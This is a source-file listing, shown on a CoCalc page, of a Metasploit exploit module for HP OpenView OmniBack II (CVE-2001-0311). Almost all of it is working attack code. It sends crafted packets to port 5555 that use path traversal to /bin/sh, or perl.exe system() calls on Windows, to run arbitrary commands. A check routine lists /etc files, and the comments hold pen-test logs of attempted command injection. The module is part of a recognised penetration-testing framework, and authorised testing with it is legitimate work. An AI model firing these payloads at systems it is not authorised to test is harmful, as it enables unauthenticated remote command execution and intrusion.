CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/openview_omniback_exec.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'HP OpenView OmniBack II Command Execution',

14
      'Description'    => %q{

15
          This module uses a vulnerability in the OpenView Omniback II

16
        service to execute arbitrary commands. This vulnerability was

17
        discovered by DiGiT and his code was used as the basis for this

18
        module.

19


20
        For Microsoft Windows targets, due to module limitations, use the

21
        "unix/cmd/generic" payload and set CMD to your command. You can only

22
        pass a small amount of characters (4) to the command line on Windows.

23
      },

24
      'Author'         => [ 'hdm', 'aushack' ],

25
      'License'        => MSF_LICENSE,

26
      'References'     =>

27
        [

28
          ['CVE', '2001-0311'],

29
          ['OSVDB', '6018'],

30
          ['BID', '11032'],

31
          ['URL', 'http://www.securiteam.com/exploits/6M00O150KG.html'],

32
        ],

33
      'Platform'       => ['unix'], # win

34
      'Arch'           => ARCH_CMD,

35
      'Privileged'     => false,

36
      'Payload'        =>

37
        {

38
          'Space'       => 1024,

39
          'DisableNops' => true,

40
          'Compat'      =>

41
            {

42
              'PayloadType' => 'cmd',

43
              'RequiredCmd' => 'generic perl telnet',

44
            }

45
        },

46
      'Targets'        =>

47
        [

48
          [ 'Unix', { }],

49
          [ 'Windows', { }],

50
        ],

51
      'DisclosureDate' => '2001-02-28',

52
      'DefaultTarget' => 0))

53


54
    register_options(

55
      [

56
        Opt::RPORT(5555)

57
      ])

58
  end

59


60
  def check

61


62
    if (target.name =~ /Unix/)

63
      connect

64


65
      poof =

66
        "\x00\x00\x00.2"+

67
        "\x00 a"+

68
        "\x00 0"+

69
        "\x00 0"+

70
        "\x00 0"+

71
        "\x00 A"+

72
        "\x00 28"+

73
        "\x00/../../../bin/sh"+

74
        "\x00\x00"+

75
        "digit "+

76
        "AAAA\n\x00"

77


78
      sock.put(poof)

79
      sock.put("echo /etc/*;\n")

80
      res = sock.get_once(-1, 5)

81
      disconnect

82


83
      if !(res and res.length > 0)

84
        vprint_status("The remote service did not reply to our request")

85
        return Exploit::CheckCode::Safe

86
      end

87


88
      if (res =~ /passwd|group|resolv/)

89
        vprint_status("The remote service is exploitable")

90
        return Exploit::CheckCode::Vulnerable

91
      end

92


93
      return Exploit::CheckCode::Safe

94
    end

95


96
    if (target.name =~ /Windows/)

97
      connect

98


99
      poof =

100
        "\x00\x00\x00.2"+

101
        "\x00 a"+

102
        "\x00 0"+

103
        "\x00 0"+

104
        "\x00 0"+

105
        "\x00 A"+

106
        "\x00 28"+

107
        "\x00\\perl.exe"+

108
        "\x00\x20-e\x20system(dir)\x00\x00"+

109
        "digit "+

110
        "AAAA\n\x00"

111


112
      sock.put(poof)

113
      res = sock.get_once(-1, 5)

114
      disconnect

115


116
      print_status(res.to_s)

117


118
      if !(res and res.length > 0)

119
        print_status("The remote service did not reply to our request")

120
        return Exploit::CheckCode::Safe

121
      end

122


123
      if (res =~ /V.o.l.u.m.e/) #Unicode

124
        print_status("The remote service is exploitable")

125
        return Exploit::CheckCode::Vulnerable

126
      end

127


128
      return Exploit::CheckCode::Safe

129
    end

130
  end

131


132
  def exploit

133
    if (target.name =~ /Unix/)

134
      connect

135


136
      poof =

137
        "\x00\x00\x00.2"+

138
        "\x00 a"+

139
        "\x00 0"+

140
        "\x00 0"+

141
        "\x00 0"+

142
        "\x00 A"+

143
        "\x00 28"+

144
        "\x00/../../../bin/sh"+

145
        "\x00\x00"+

146
        "digit "+

147
        "AAAA\n\x00"

148


149
      sock.put(poof)

150
      sock.put(payload.encoded + ";\n")

151
      res = sock.get_once(-1, 5)

152


153
      if !(res and res.length > 0)

154
        print_status("The remote service did not reply to our request")

155
        disconnect

156
        return

157
      end

158


159
      print(res)

160


161
      handler

162
      disconnect

163
    end

164


165
    if (target.name =~ /Windows/)

166


167
      # aushack

168
      #

169
      # Tested during pen test against Windows 2003 server.

170
      # Windows Service details:

171
      # - Data Protector Inet

172
      # -> [HP OpenView Storage Data Protector] - Backup client service

173
      # -> "C:\Program Files\OmniBack\bin\omniinet.exe"

174
      # -> OmniInet service for Windows NT

175
      # -> File version: 6.0.0.0

176
      #

177
      # This needs to be cleaned up later. Preferably using the Windows/cmd/perl payloads.

178
      #

179
      # Notes:

180
      # I was unable to use directory traversal, OR (||) or AND (&&) techniques to directly run cmd.exe

181
      # Perhaps a difference in Windows/Unix code? Logs:

182
      #

183
      #11/11/2008 12:18:37 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384

184
      #A request 28 (..\foo.exe) came from host [attacker] which is not a cell manager of this client

185
      #

186
      #11/11/2008 12:18:37 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384

187
      #[RxNtIntegUtil] parameter refused: ..\foo.exe

188
      #

189
      #11/11/2008 12:21:59 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384

190
      #A request 28 (x.exe || cmd /c dir > c:) came from host [attacker] which is not a cell manager of this client

191
      #

192
      #11/11/2008 12:21:59 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384

193
      #[RxNtIntegUtil] parameter refused: x.exe || cmd /c dir > c:

194
      #

195
      #11/11/2008 12:22:40 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384

196
      #A request 28 (perl.exe && cmd /c dir >) came from [attacker] which is not a cell manager of this client

197
      #

198
      #11/11/2008 12:22:40 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384

199
      #[RxNtIntegUtil] parameter refused: perl.exe && cmd /c dir >

200


201
      connect

202


203
      poof =

204
        "\x00\x00\x00.2"+

205
        "\x00 a"+

206
        "\x00 0"+

207
        "\x00 0"+

208
        "\x00 0"+

209
        "\x00 A"+

210
        "\x00 28"+

211
        "\x00\\perl.exe"+

212
        "\x00\x20-esystem(#{payload.encoded})\x00\x00"+

213
        "digit "+

214
        "AAAA\n\x00"

215


216
      sock.put(poof)

217
      #sock.put(payload.encoded + "\n")

218
      res = sock.get_once(-1, 5)

219


220
      if !(res and res.length > 0)

221
        print_status("The remote service did not reply to our request")

222
        disconnect

223
        return

224
      end

225


226
      print(res)

227


228
      handler

229
      disconnect

230
    end

231
  end

232
end

233


234